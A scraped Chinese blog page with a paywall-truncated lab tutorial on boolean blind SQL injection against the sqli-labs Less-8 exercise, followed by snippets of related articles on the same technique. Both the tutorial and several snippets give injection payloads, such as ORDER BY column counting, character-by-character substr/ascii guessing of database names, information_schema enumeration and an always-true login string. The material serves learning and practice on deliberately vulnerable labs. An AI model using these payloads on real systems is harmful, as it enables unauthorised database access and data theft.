SQL注入bool注入

SQL注入:布尔盲注实战
最新推荐文章于 2025-03-19 12:24:14 发布
原创 最新推荐文章于 2025-03-19 12:24:14 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #SQL注入 #web漏洞

本文详细介绍了如何进行SQL注入中的布尔盲注,从预备知识到实验步骤,包括判断列数、数据库名称、表名及列名,最终揭示了username的值。

一、预备知识

二、实验目的

三、实验工具

浏览器

四、实验环境

客户机一台

五、实验步骤

第一步:访问

http://www.any.com/sqli/Less-8/?id=1

页面正常:

在这里插入图片描述

第二步:加入单引号,访问

http://www.any.com/sqli/Less-8/?id=1'

不会报错,但是页面不正常,可以判断是bool型注入:

在这里插入图片描述

第三步:判断列数(通过二分法)

1)输入:

http://www.any.com/sqli/Less-8/?id=1' order by 3 %23

页面正常,说明大于等于3列:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/?id=1' order by 4 %23

页面不正常,说明小于4列,结合上面的可以确定有3列:

在这里插入图片描述

第四步:查看数据库名称

1)输入:


                

                
                
        

    

  


        

            

                      
                        最低0.47元/天 解锁文章
                          
                      
            

        


    



                



	

		

			

				
					
sql注入bool盲注

				
			

			

				

					banliyaoguai的博客
				

				

					05-12
					
					786
					
				

			

		

		

			
				
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。

			
		

	



                

            
              



	

		

			

				
					
SQL注入--盲注入bool型)

				
			

			

				

					liukenn的博客
				

				

					07-30
					
					7891
					
				

			

		

		

			
				
一个带GET参数的网站,但是网页中没有返回任何查询结果和报错信息,只返回对和错:






盲注入格式:
http://127.0.0.1/index.php?id=1' and ascii(substr(
(SQL语句),1,1
))=ASCII%23
注:

SQL语句 输入SQL注入语句;
ASCII 返回的字符的ASCII码;
1 第一个字母,从1开始算起;

			
		

	



              


  
              

                


	

		

			

				
					
sql注入之盲注(bool盲注,时间盲注)

				
			

			

				

					m0_73994306的博客
				

				

					02-13
					
					636
					
				

			

		

		

			
				
当页面,但能通过间接判断SQL语句执行结果时。

			
		

	





	

		

			

				
					
SQL注入Bool盲注(510cms)

				
			

			

				

					qq_45775897的博客
				

				

					01-05
					
					3140
					
				

			

		

		

			
				
SQL注入之get可以参考:
https://blog.youkuaiyun.com/qq_45775897/article/details/122332051
一、查找是否存在SQL注入注入点)
以510企业网站为例:

这里以漏洞参数id为例
用?id=1和id=1'进行测试,前提能够正常显示。
在?id=1后面加上and 1=1两个结果都是真的,所以正常输出;
后面加上and 1=2如果正常输出,说明前后都是真的,则表示是字符型。反之是数值型
eg:
http://IP地址(域名)/news.php?cid=&

			
		

	



		

			
		



	

		

			

				
					
SQLi-LABS

				
			

			

				

					m0_74855736的博客
				

				

					03-14
					
					1098
					
				

			

		

		

			
				
单引号闭合确定数据库查询的字段数确定显示位查询当前数据库名,查询当前数据库下所有的表查询user表中的字段数查询字段的数据。

			
		

	





	

		

			

				
					
sql注入之布尔booler注入

				
			

			

				

					m0_52484587的博客
				

				

					07-09
					
					1511
					
				

			

		

		

			
				
id=1' and substr((select column_name from information_schema.columns where table_schema='test' and table_name='users' limit 0,1),1,1)='a'--+ id   username  password 等。id=1' and substr(database(),1,1)='a'--+ 逐字判断数据库名为 test,test 数据库名。3.id=1 and 1=2  结果异常。

			
		

	





	

		

			

				
					
超级SQL注入工具-web-sql

				
			

			

				

					10-28
				

			

		

		

			
				
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...

			
		

	





	

		

			

				
					
iwebsec靶场SQL注入-bool盲注

				
			

			

				

					qq_56041380的博客
				

				

					03-24
					
					565
					
				

			

		

		

			
				
bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。

			
		

	





	

		

			

				
					
SQL注入之布尔式(boolean)注入

				
			

			

				

					2301_79299101的博客
				

				

					09-22
					
					595
					
				

			

		

		

			
				
输入1' and if(substring(database(),1,1)='d',1,0)--+输入1'and if(length(database())=4,1,0) #其他的表名和列都用同样的方法 ,其他信息也是一样。输入    vince'and'1'='1。再输入 vince'and'1'='2。2,判断是数字式还是字符型。3,判断数据库有多少个字段。

			
		

	





	

		

			

				
					
SQL注入boolean盲注+时间盲注)

					
最新发布

				
			

			

				

					2201_76045651的博客
				

				

					03-19
					
					847
					
				

			

		

		

			
				
布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入攻击技术,攻击者通过观察应用程序的布尔响应(真/假)来推断数据库中的信息。这种攻击通常发生在应用程序不直接返回数据库错误信息或查询结果,但会根据查询条件返回不同的响应(如页面内容、HTTP状态码等)时。

			
		

	





	

		

			

				
					
SQL注入之基于布尔的盲注详解

				
			

			

				

					09-10
				

			

		

		

			
				
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。

			
		

	





	

		

			

				
					
sql注入整理之布尔盲注入

				
			

			

				

					qq_37079022的博客
				

				

					07-14
					
					9908
					
				

			

		

		

			
				
1' and ascii(substr(database(),1,1))=1 --     使用ascii将值变为数字。1' and substr(database(),1,1)='a' -- 显示 不存在。1' and substr(database(),1,1)='b' -- 显示 不存在。1' and substr(database(),1,1)='c' -- 显示 不存在。1' and substr(database(),1,1)='a' -- 显示 不存在。

			
		

	





	

		

			

				
					
mysql bool注入,SQL注入【七】——Boolean注入

				
			

			

				

					weixin_39862097的博客
				

				

					03-23
					
					468
					
				

			

		

		

			
				
基本注入流程有些人以为布尔盲注就是页面或者返回结果数据包中带有yes或者no,其实这种说法不正确0x01 判断注入点类型数字型字符型如果是字符型还得通过闭合,具体可以查看我之前的文章数字型和字符型0x02 获取数据库库名1. 判断当前数据库库名长度length():判断字符长度利用and length(database())不断去构造条件,如:and length(database())>1...

			
		

	





	

		

			

				
					
MYSQL布尔注入

				
			

			

				

					ZccAc的博客
				

				

					09-16
					
					528
					
				

			

		

		

			
				
MYSQL布尔注入

原理为利用mid()获取字符,利用ord()将字符转为ASCII码,利用>、<和=来确定字符的范围。
获取数据库名长度
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or  length(database())=8#

获取数据库名
http://127.0.0.1/sql/sqli-labs/Less-5/?id=1’ and 1>2 or  ord(mid(database(),1,1))=115.

			
		

	





	

		

			

				
					
SQL注入-布尔型盲注

				
			

			

				

					qq_65240014的博客
				

				

					07-26
					
					869
					
				

			

		

		

			
				
关于sql注入的略微进阶一点的文章,介绍关于bool型盲注的方法

			
		

	





	

		

			

				
					
渗透(五)之MySQL的布尔注入

				
			

			

				

					qq_32719221的博客
				

				

					09-12
					
					961
					
				

			

		

		

			
				
SQL盲注–bool注入
布尔盲注的原理

后端不往前端返回具体的数据库的值,通过页面显示正常与否,判断SQL注入的值是否为真。
布尔盲注方法:

针对sqli-labs/less-8
一开始:
当url为
127.0.0.1/less-8/?id=1
对应的SQL语句
SELECT  * FROM users WHERE id = ‘1’ LIMIT 0,1
先测试系统有无SQL注入漏洞
当ur...

			
		

	





	

		

			

				
					
SQL注入之路之二:布尔型(boolean)盲注

				
			

			

				

					weixin_62715196的博客
				

				

					08-10
					
					1817
					
				

			

		

		

			
				
简单描述什么是布尔型盲注以及对与布尔型盲注如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔型注入的合理性

			
		

	





	

		

			

				
					
sql注入原理及各姿势sqlmap使用

				
			

			

				

					m0_63641882的博客
				

				

					12-04
					
					2384
					
				

			

		

		

			
				
ps:及后端服务器在收到参数未对参数进行过滤直接带入数据库当中进行查询,这样就导致了参数拼接构造的sql语句进行执行列子:当我们在前端进行页面登录的时候后端代码


输入用户admin和万能密码:2' or '1时后端代码


因为逻辑运算符有优先级之分 or

			
		

	





	

		

			

				
					
SQL注入--盲注入(time型)

				
			

			

				

					liukenn的博客
				

				

					07-30
					
					5994
					
				

			

		

		

			
				
注:看这篇文章之前请先看上一篇文章


一个带GET参数的网站,并且不过对错都返回相同的页面!
http://127.0.0.1/index.php?id=1


http://127.0.0.1/index.php?id=1'





由于对错返回的页面一样,无法通过页面判断对错,就使用页面刷新时间来判断对错;
具体情况请了解SQL的 if(SQL语句,sleep(

			
		

	





	

		

			

				
					
SSQLInjection:HTTP协议SQL注入利器

				
			

			

				

					
				

			

		

		

			
				
超级SQL注入工具作为一个强大的SQL注入辅助工具,不仅可以帮助安全研究人员和开发人员测试应用程序的安全性,也可以作为学习SQL注入技术的一个平台。然而,使用这类工具进行安全测试必须在合法授权的环境下进行,...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值